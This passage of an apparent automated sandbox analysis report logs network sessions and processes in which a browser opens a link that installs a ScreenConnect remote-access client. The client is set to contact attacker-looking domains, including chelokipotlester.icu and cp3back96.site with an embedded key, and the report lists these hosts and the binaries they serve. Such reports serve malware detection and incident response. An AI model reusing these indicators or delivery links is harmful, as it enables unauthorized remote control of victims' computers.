                                                       Accept-Encoding: gzip
2024-10-29 18:34:46 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                       Date: Tue, 29 Oct 2024 18:34:45 GMT
                                                       Connection: close
2024-10-29 18:34:46 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.16  49724        37.221.67.19    443               7692  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 18:34:47 UTC  142                OUT        GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                       Host: cp9856.chelokipotlester.icu
                                                       Accept-Encoding: gzip
                                                       Connection: Keep-Alive
2024-10-29 18:34:47 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                       Date: Tue, 29 Oct 2024 18:34:47 GMT
                                                       Connection: close
2024-10-29 18:34:47 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.16  49725        37.221.67.19    443               7692  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 18:34:48 UTC  126                OUT        GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                       Host: cp9856.chelokipotlester.icu
                                                       Accept-Encoding: gzip
2024-10-29 18:34:48 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                       Date: Tue, 29 Oct 2024 18:34:48 GMT
                                                       Connection: close
2024-10-29 18:34:48 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.16  49726        37.221.67.19    443               7692  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 18:34:49 UTC  140                OUT        GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                       Host: cp9856.chelokipotlester.icu
                                                       Accept-Encoding: gzip
                                                       Connection: Keep-Alive
2024-10-29 18:34:49 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 81696
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                       Date: Tue, 29 Oct 2024 18:34:49 GMT
                                                       Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.16  49727        37.221.67.19    443               7692  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-29 18:34:51 UTC  111                OUT        GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                       Host: cp9856.chelokipotlester.icu
                                                       Accept-Encoding: gzip
2024-10-29 18:34:51 UTC  217                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 587040
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                       Date: Tue, 29 Oct 2024 18:34:51 GMT
                                                       Connection: close


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              11 | 192.168.2.16 | 49728 | 20.109.210.53 | 443 | |
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-29 18:34:51 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                              2024-10-29 18:34:51 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Expires: -1
                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                              MS-CorrelationId: f658acde-e10a-4a2c-9079-266a6eae3456
                                                                                                                                                                              MS-RequestId: 320bcb14-6a5e-42bc-90ea-261b5e88bd8f
                                                                                                                                                                              MS-CV: UGfP7pMDgEa0eEVX.0
                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:50 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 30005


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              12 | 192.168.2.16 | 49729 | 37.221.67.19 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-29 18:34:55 UTC | 129 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:56 UTC | 218 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 1716224
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:55 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: ta0WinlogonExecutablePathCommandLine\\GTruncated output at {0} characters.powershellpsrun.cmdps1cmd.exeKWindowsPowers


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              13 | 192.168.2.16 | 49730 | 37.221.67.19 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-29 18:35:01 UTC | 102 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:35:01 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 531456
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:01 GMT
                                                                                                                                                                              Connection: close


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              14 | 192.168.2.16 | 49731 | 37.221.67.19 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-10-29 18:35:03 UTC | 128 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:35:03 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 192512
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:03 GMT
                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.16 | 49733 | 37.221.67.19 | 443 | 7692 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:35:05 UTC | 111 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: cp9856.chelokipotlester.icu
Accept-Encoding: gzip
2024-10-29 18:35:05 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61952
Content-Type: text/html
Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
Date: Tue, 29 Oct 2024 18:35:05 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.16 | 49738 | 204.79.197.200 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:35:42 UTC | 2229 | OUT | POST /threshold/xls.aspx HTTP/1.1
Origin: https://www.bing.com
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept: */*
Accept-Language: en-CH
Content-type: text/xml
X-Agent-DeviceId: 01000A4109009A83
X-BM-CBT: 1707317755
X-BM-DateFormat: dd/MM/yyyy
X-BM-DeviceDimensions: 784x984
X-BM-DeviceDimensionsLogical: 784x984
X-BM-DeviceScale: 100
X-BM-DTZ: 60
X-BM-Market: CH
X-BM-Theme: 000000;0078d7
X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1
X-Device-isOptin: false
X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
X-Device-OSSKU: 48
X-Device-Touch: false
X-DeviceID: 01000A4109009A83
X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
X-MSEdge-ExternalExpType: JointCoord
X-PositionerType: Desktop
X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
X-Search-CortanaAvailableCapabilities: None
X-Search-SafeSearch: Moderate
X-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
X-UserAgeClass: Unknown
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: www.bing.com
Content-Length: 765
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-10-29 18:35:42 UTC | 765 | OUT | Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>55f083bee69e4199847f34d07885b2a9</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","totalnumberOfEntries":"0"
2024-10-29 18:35:42 UTC | 426 | IN | HTTP/1.1 204 No Content
Access-Control-Allow-Origin: *
X-Cache: CONFIG_NOCACHE
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 8C439598C5364E1B88962E68A38D0662 Ref B: DFW30EDGE1811 Ref C: 2024-10-29T18:35:42Z
Date: Tue, 29 Oct 2024 18:35:42 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.16 | 49739 | 204.79.197.222 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-29 18:35:46 UTC | 462 | OUT | GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1
Origin: https://www.bing.com
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept: */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: fp.msedge.net
Connection: Keep-Alive
2024-10-29 18:35:46 UTC | 428 | IN | HTTP/1.1 200 OK
Cache-Control: public,max-age=900
Content-Length: 20076
Content-Type: application/json; charset=utf-8
ETag: "891537008"
Access-Control-Allow-Origin: *
Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: A3B4495344F74E8382716A3EA417CF8E Ref B: DFW30EDGE0112 Ref C: 2024-10-29T18:35:46Z
Date: Tue, 29 Oct 2024 18:35:45 GMT
Connection: close


Session ID: 18, Source IP: 192.168.2.16, Source Port: 49740, Destination IP: 13.107.4.254, Destination Port: 443
Timestamp: 2024-10-29 18:35:49 UTC, Bytes transferred: 481, Direction: OUT, Data:
GET /apc/trans.gif?a75363d0418258491551ead6717ca895 HTTP/1.1
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: c-ring.msedge.net
                                                                                                                                                                              Connection: Keep-Alive
Timestamp: 2024-10-29 18:35:49 UTC, Bytes transferred: 706, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Endpoint: DFW30r4a
                                                                                                                                                                              X-Frontend: AFD
                                                                                                                                                                              X-Machinename: DFW30EDGE1711
                                                                                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              X-MSEdge-Ref: Ref A: 569926EBD7C341DB956639EBCE5A4F0C Ref B: DFW30EDGE1711 Ref C: 2024-10-29T18:35:49Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:49 GMT
                                                                                                                                                                              Connection: close
Timestamp: 2024-10-29 18:35:49 UTC, Bytes transferred: 43, Direction: IN, Data:
Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                              Data Ascii: GIF89a!,D;


Session ID: 19, Source IP: 192.168.2.16, Source Port: 49741, Destination IP: 13.107.4.254, Destination Port: 443
Timestamp: 2024-10-29 18:35:50 UTC, Bytes transferred: 481, Direction: OUT, Data:
GET /apc/trans.gif?3d4619f8959a0bb944ce9eb8ccf482ff HTTP/1.1
                                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                              Host: c-ring.msedge.net
                                                                                                                                                                              Connection: Keep-Alive
Timestamp: 2024-10-29 18:35:50 UTC, Bytes transferred: 706, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Content-Length: 43
                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Endpoint: DFW30r4c
                                                                                                                                                                              X-Frontend: AFD
                                                                                                                                                                              X-Machinename: DFW30EDGE1915
                                                                                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                              X-MSEdge-Ref: Ref A: 4948DAE5600440F1B0C4A6920141F892 Ref B: DFW30EDGE1915 Ref C: 2024-10-29T18:35:50Z
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:49 GMT
                                                                                                                                                                              Connection: close
Timestamp: 2024-10-29 18:35:50 UTC, Bytes transferred: 43, Direction: IN, Data:
Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:14:34:02
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:14:34:02
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:14:34:03
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:14:34:05
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:14:34:06
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                              Imagebase:0x7ff7648e0000
                                                                                                                                                                              File size:329'504 bytes
                                                                                                                                                                              MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:14:34:13
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                              Imagebase:0x7ff62c440000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:14:34:24
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              Wow64 process (32bit):false
